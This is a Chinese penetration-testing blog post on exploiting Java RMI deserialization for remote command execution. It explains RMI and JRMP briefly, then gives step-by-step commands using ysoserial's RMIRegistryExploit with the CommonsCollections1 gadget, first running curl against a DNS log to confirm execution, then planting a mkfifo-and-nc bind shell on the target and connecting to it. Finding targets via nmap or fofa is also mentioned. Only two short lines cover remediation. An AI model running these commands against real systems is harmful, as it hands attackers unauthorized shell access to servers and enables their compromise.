Java RMI 反序列化漏洞-远程命令执行

75abd55248b091f3440dff362606f35c.gif

点击"仙网攻城狮”关注我们哦~

不当想研发的渗透人不是好运维7088230813432614f3f905a60d9be667.png

让我们每天进步一点点

简介

RMI即远程方法调用,通俗的来说就是客户端可以调用服务端的方法。和RPC差不多,RMI是java独立实现的一种机制。

RMI使用的通信协议为JRMP(Java Remote Message Protocol ,Java 远程消息交换协议),该协议为Java定制,要求服务端与客户端都为Java编写。

在RMI的通信过程中,用到了很多的序列化和反序列化,而在Java中,只要进行反序列化操作就可能有漏洞。RMI通过序列化传输Remote对象,那么我们可以构造恶意的Remote对象,当服务端反序列化传输过来的数据时,就会触发反序列化,从而执行payload

实战

1.有可以直接使用的反序列化工具ysoserial里面集合了各种java接口反序列化exp,下载地址:

https://github.com/angelwhu/ysoserial

2.nmap或fofa发现端口和服务

af8334e624ef164efeda7fb4f9580044.png

3.出网测试方法:开启一个dnslog来确认命令执行。

6839ace3b5b4a39eda5acf98dc4ebc00.png

4.使用反序列化exp进行命令执行

命令格式:java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit 目标ip 目标端口 CommonsCollections1 "curl dnslog"

运行过程中会出错,不用管还是可以执行命令的

4cda8719423723940ddf4840a19ec6b4.png

5.查看dnslog 发现命令已经执行成功

5c1dd82853fdae47bc0feb0df6dd8457.png

6.也可以直接开启nc后门

java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit 目标ip 目标端口 CommonsCollections1 "rm -f /tmp/f; mkfifo /tmp/f"
java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit 目标ip 目标端口 CommonsCollections1 "cat /tmp/f | /bin/sh -i 2>&1 | nc -l 1234 > /tmp/f"

7.使用nc进行连接

命令格式:nc 目标ip 目标端口

修复方法:

1.升级最新版本

2.过滤一些危险的类

往期内容

ZooKeeper 未授权访问漏洞利用

java JDWP调试接口任意命令执行漏洞

工具篇-BurpSutie Pro 2021.10.1最新版本

8582b39bb537c5b15798d1bbe8c8a961.gif

0ac1f17b24f79335fd2e8c7984dbeaad.gif

更多资讯长按二维码 关注我们

觉得不错点个“赞”呗4247980505034084699e183a13bd2410.png      

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值